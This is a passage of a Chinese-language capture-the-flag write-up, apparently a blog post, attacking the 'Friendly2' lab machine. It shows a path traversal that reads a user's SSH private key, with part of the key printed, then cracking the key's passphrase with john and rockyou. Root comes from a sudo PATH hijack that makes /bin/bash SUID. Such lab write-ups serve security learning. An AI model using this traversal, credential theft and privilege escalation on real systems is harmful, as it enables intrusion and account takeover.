ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256\ndebug2: ciphers ctos: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com\ndebug2: ciphers stoc: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com\ndebug2: MACs ctos: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\ndebug2: MACs stoc: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\ndebug2: compression ctos: none,zlib@openssh.com,zlib\ndebug2: compression stoc: none,zlib@openssh.com,zlib\ndebug2: languages ctos: \ndebug2: languages stoc: \ndebug2: first_kex_follows 0 \ndebug2: reserved 0 \ndebug2: peer server KEXINIT proposal\ndebug2: KEX algorithms: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256\ndebug2: host key algorithms: rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256,ssh-ed25519\ndebug2: ciphers ctos: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com\ndebug2: ciphers stoc: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com\ndebug2: MACs ctos: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\ndebug2: MACs stoc: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\ndebug2: compression ctos: none,zlib@openssh.com\ndebug2: compression stoc: none,zlib@openssh.com\ndebug2: languages ctos: \ndebug2: languages stoc: \ndebug2: first_kex_follows 0 \ndebug2: reserved 0 \ndebug1: kex: algorithm: curve25519-sha256\ndebug1: kex: host key algorithm: ssh-ed25519\ndebug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none\ndebug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none\ndebug3: send packet: type 30\ndebug1: expecting SSH2_MSG_KEX_ECDH_REPLY\ndebug3: receive packet: type 31\ndebug1: SSH2_MSG_KEX_ECDH_REPLY received\ndebug1: Server host key: ssh-ed25519 SHA256:YDW5zhbCol\/1L6a3swXHsFDV6D3tUVbC09Ch+bxLR08\ndebug3: record_hostkey: found key type ED25519 in file \/home\/kali\/.ssh\/known_hosts:22\ndebug3: load_hostkeys_file: loaded 1 keys from 172.20.10.4\ndebug1: load_hostkeys: fopen \/home\/kali\/.ssh\/known_hosts2: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts2: No such file or directory\ndebug1: Host '172.20.10.4' is known and matches the ED25519 host key.\ndebug1: Found key in \/home\/kali\/.ssh\/known_hosts:22\ndebug3: send packet: type 21\ndebug2: ssh_set_newkeys: mode 1\ndebug1: rekey out after 134217728 blocks\ndebug1: SSH2_MSG_NEWKEYS sent\ndebug1: expecting SSH2_MSG_NEWKEYS\ndebug3: receive packet: type 21\ndebug1: SSH2_MSG_NEWKEYS received\ndebug2: ssh_set_newkeys: mode 0\ndebug1: rekey in after 134217728 blocks\ndebug3: send packet: type 5\ndebug3: receive packet: type 7\ndebug1: SSH2_MSG_EXT_INFO received\ndebug3: kex_input_ext_info: extension server-sig-algs\ndebug1: kex_ext_info_client_parse: server-sig-algs=<ssh-ed25519,sk-ssh-ed25519@openssh.com,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,webauthn-sk-ecdsa-sha2-nistp256@openssh.com>\ndebug3: receive packet: type 6\ndebug2: service_accept: ssh-userauth\ndebug1: SSH2_MSG_SERVICE_ACCEPT received\ndebug3: send packet: type 50\ndebug3: receive packet: type 51\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive\ndebug3: start over, passed a different list publickey,password,keyboard-interactive\ndebug3: preferred gssapi-with-mic,publickey,keyboard-interactive,password\ndebug3: authmethod_lookup publickey\ndebug3: remaining preferred: keyboard-interactive,password\ndebug3: authmethod_is_enabled publickey\ndebug1: Next authentication method: publickey\ndebug1: Will attempt key: id_rsa explicit\ndebug2: pubkey_prepare: done\ndebug1: Trying private key: id_rsa\nLoad key "id_rsa": error in libcrypto\ndebug2: we did not send a packet, disable method\ndebug3: authmethod_lookup keyboard-interactive\ndebug3: remaining preferred: password\ndebug3: authmethod_is_enabled keyboard-interactive\ndebug1: Next authentication method: keyboard-interactive\ndebug2: userauth_kbdint\ndebug3: send packet: type 50\ndebug2: we sent a keyboard-interactive packet, wait for reply\ndebug3: receive packet: type 60\ndebug2: input_userauth_info_req: entering\ndebug2: input_userauth_info_req: num_prompts 1<\/code><\/pre>\n\u53ef\u80fd\u662f\u683c\u5f0f\u539f\u56e0\uff1f<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ rm id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ wget http:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=..\/..\/..\/..\/..\/home\/gh0st\/.ssh\/id_rsa \n--2024-04-14 04:43:59-- http:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=..\/..\/..\/..\/..\/home\/gh0st\/.ssh\/id_rsa\nConnecting to 172.20.10.4:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 2655 (2.6K) [text\/html]\nSaving to: \u2018check_if_exist.php?doc=..%2F..%2F..%2F..%2F..%2Fhome%2Fgh0st%2F.ssh%2Fid_rsa\u2019\ncheck_if_exist.php?doc=..%2F..%2F..%2 100%[=========================================================================>] 2.59K --.-KB\/s in 0s \n2024-04-14 04:43:59 (369 MB\/s) - \u2018check_if_exist.php?doc=..%2F..%2F..%2F..%2F..%2Fhome%2Fgh0st%2F.ssh%2Fid_rsa\u2019 saved [2655\/2655]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ head id_rsa\nhead: cannot open 'id_rsa' for reading: No such file or directory\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxr-xr-x 2 kali kali 4096 Apr 14 04:43 .\ndrwxr-xr-x 36 kali kali 4096 Apr 14 04:26 ..\n-rw-r--r-- 1 kali kali 2655 Apr 14 04:43 'check_if_exist.php?doc=..%2F..%2F..%2F..%2F..%2Fhome%2Fgh0st%2F.ssh%2Fid_rsa'\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ mv * id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ls \nid_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ head id_rsa \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC7peoQE4\nzNYwvrv72HTs4TAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQC2i1yzi3G5\nQPSlTgc\/EdnvrisIm0Z0jq4HDQJDRMaXQ4i4UdIlbEgmO\/FA17kHzY1Mzi5vJFcLUSVVcF\n1IAny5Dh8VA4t\/+LRH0EFx6ZFibYinUJacgteD0RxRAUqNOjiYayzG1hWdKsffGzKz8EjQ\n9xcBXAR9PBs6Wkhur+UptHi08QmtCWLV8XAo0DW9ATlkhSj25KiicNm+nmbEbLaK1U7U\/C\naXDHZCcdIdkZ1InLj246sovn5kFPaBBHbmez9ji11YNaHVHgEkb37bLJm95l3fkU6sRGnz\n6JlqXYnRLN84KAFssQOdFCFKqAHUPC4eg2i95KVMEW21W3Cen8UFDhGe8sl++VIUy\/nqZn\n8ev8deeEk3RXDRb6nwB3G+96BBgVKd7HCBediqzXE5mZ64f8wbimy2DmM8rfBMGQBqjocn\nxkIS7msERVerz4XfXURZDLbgBgwlcWo+f8z2RWBawVgdajm3fL8RgT7At\/KUuD7blQDOsk\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh gh0st@172.20.10.4 -i id_rsa \nEnter passphrase for key 'id_rsa':<\/code><\/pre>\n\u770b\u6765\u662f\u79c1\u94a5\u8fd8\u6709\u5bc6\u7801\u4e86\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh2john id_rsa > hash.txt \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 2 for all loaded hashes\nCost 2 (iteration count) is 16 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nceltic (id_rsa) \n1g 0:00:00:15 DONE (2024-04-14 04:53) 0.06640g\/s 16.99p\/s 16.99c\/s 16.99C\/s 888888..freedom\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\uff01<\/p>\n
<\/div><\/p>\n\u62ff\u4e0b\uff01<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ngh0st@friendly2:~$ pwd\n\/home\/gh0st\ngh0st@friendly2:~$ ls -la\ntotal 32\ndrwxr-xr-x 4 gh0st gh0st 4096 Apr 29 2023 .\ndrwxr-xr-x 3 root root 4096 Apr 27 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 29 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 gh0st gh0st 220 Mar 27 2022 .bash_logout\n-rw-r--r-- 1 gh0st gh0st 3526 Mar 27 2022 .bashrc\ndrwxr-xr-x 3 gh0st gh0st 4096 Apr 29 2023 .local\n-rw-r--r-- 1 gh0st gh0st 807 Mar 27 2022 .profile\ndrwx--x--x 2 gh0st gh0st 4096 Apr 29 2023 .ssh\n-r--r----- 1 gh0st root 33 Apr 27 2023 user.txt\ngh0st@friendly2:~$ cat user.txt \nab0366431e2d8ff563cf34272e3d14bd\ngh0st@friendly2:~$ sudo -l\nMatching Defaults entries for gh0st on friendly2:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser gh0st may run the following commands on friendly2:\n (ALL : ALL) SETENV: NOPASSWD: \/opt\/security.sh\ngh0st@friendly2:~$ cat \/opt\/security.sh\n#!\/bin\/bash\n\necho "Enter the string to encode:"\nread string\n\n# Validate that the string is no longer than 20 characters\nif [[ ${#string} -gt 20 ]]; then\n echo "The string cannot be longer than 20 characters."\n exit 1\nfi\n\n# Validate that the string does not contain special characters\nif echo "$string" | grep -q '[^[:alnum:] ]'; then\n echo "The string cannot contain special characters."\n exit 1\nfi\n\nsus1='A-Za-z'\nsus2='N-ZA-Mn-za-m'\n\nencoded_string=$(echo "$string" | tr $sus1 $sus2)\n\necho "Original string: $string"\necho "Encoded string: $encoded_string"<\/code><\/pre>\n\u6dfb\u52a0\u73af\u5883\u53d8\u91cf<\/h3>\ngh0st@friendly2:\/tmp$ echo 'chmod +s \/bin\/bash' > grep\ngh0st@friendly2:\/tmp$ chmod +x grep\ngh0st@friendly2:\/tmp$ whereis grep\ngrep: \/usr\/bin\/grep \/tmp\/grep \/usr\/share\/man\/man1\/grep.1.gz \/usr\/share\/info\/grep.info.gz\ngh0st@friendly2:\/tmp$ sudo \/opt\/security.sh\nEnter the string to encode:\nasdasdasdasd\nOriginal string: asdasdasdasd\nEncoded string: nfqnfqnfqnfq\ngh0st@friendly2:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\ngh0st@friendly2:\/tmp$ sudo PATH=$PWD:$PATH \/opt\/security.sh\nEnter the string to encode:\n213123123\nThe string cannot contain special characters.\ngh0st@friendly2:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\ngh0st@friendly2:\/tmp$ bash -p\nbash-5.1# cd \/root\nbash-5.1# ls -la\ntotal 28\ndrwx------ 3 root root 4096 Apr 29 2023 .\ndrwxr-xr-x 19 root root 4096 Apr 27 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 27 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\n-r-xr-xr-x 1 root root 509 Apr 27 2023 interfaces.sh\ndrwxr-xr-x 3 root root 4096 Apr 8 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-r-------- 1 root root 43 Apr 29 2023 root.txt\nbash-5.1# cat root.txt \nNot yet! Try to find root.txt.\n\nHint: ...\nbash-5.1# find \/ -name root.txt -type f 2>\/dev\/null\n\/root\/root.txt\nbash-5.1# find \/ -name "..." 2>\/dev\/null\n\/...\nbash-5.1# cd \/...\nbash-5.1# ls -la\ntotal 12\nd-wx------ 2 root root 4096 Apr 29 2023 .\ndrwxr-xr-x 19 root root 4096 Apr 27 2023 ..\n-r-------- 1 root root 100 Apr 29 2023 ebbg.txt\nbash-5.1# cat ebbg.txt \nIt's codified, look the cipher:\n\n98199n723q0s44s6rs39r33685q8pnoq\n\nHint: numbers are not codified<\/code><\/pre>\n\u5c1d\u8bd5\u4fee\u6539\u4e00\u4e0b\u811a\u672c\uff0c\u8ba9\u811a\u672c\u8fdb\u884c\u89e3\u5bc6\uff1a<\/p>\n
#!\/bin\/bash\n\necho "Enter the string to encode:"\nread string\n\n# Validate that the string is no longer than 20 characters\nif [[ ${#string} -gt 50 ]]; then\n echo "The string cannot be longer than 50 characters."\n exit 1\nfi\n\n# Validate that the string does not contain special characters\nif echo "$string" | grep -q '[^[:alnum:] ]'; then\n echo "The string cannot contain special characters."\n exit 1\nfi\n\nsus1='A-Za-z'\nsus2='N-ZA-Mn-za-m'\n\nencoded_string=$(echo "$string" | tr $sus1 $sus2)\n\necho "Original string: $string"\necho "Encoded string: $encoded_string"<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ .\/decrypt.py \nzsh: permission denied: .\/decrypt.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ chmod +x decrypt.py \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ .\/decrypt.py\nEnter the string to encode:\n98199n723q0s44s6rs39r33685q8pnoq\nOriginal string: 98199n723q0s44s6rs39r33685q8pnoq\nEncoded string: 98199a723d0f44f6ef39e33685d8cabd<\/code><\/pre>\n\u5f97\u5230flag\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Friendly2 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.4 — -A Open […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-554","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=554"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/554\/revisions"}],"predecessor-version":[{"id":555,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/554\/revisions\/555"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=554"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240414162943889\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730458.png\")
<\/div>![\"image-20240414163006171\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730459.png\")
<\/div>![\"image-20240414163058799\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730460.png\")
<\/div>![\"image-20240414163038865\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730461.png\")
<\/div><\/p>\n![\"image-20240414163154417\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730462.png\")
<\/div><\/p>\n![\"image-20240414163515560\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730463.png\")
<\/div><\/p>\n![\"image-20240414165445205\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730464.png\")
<\/div><\/p>\n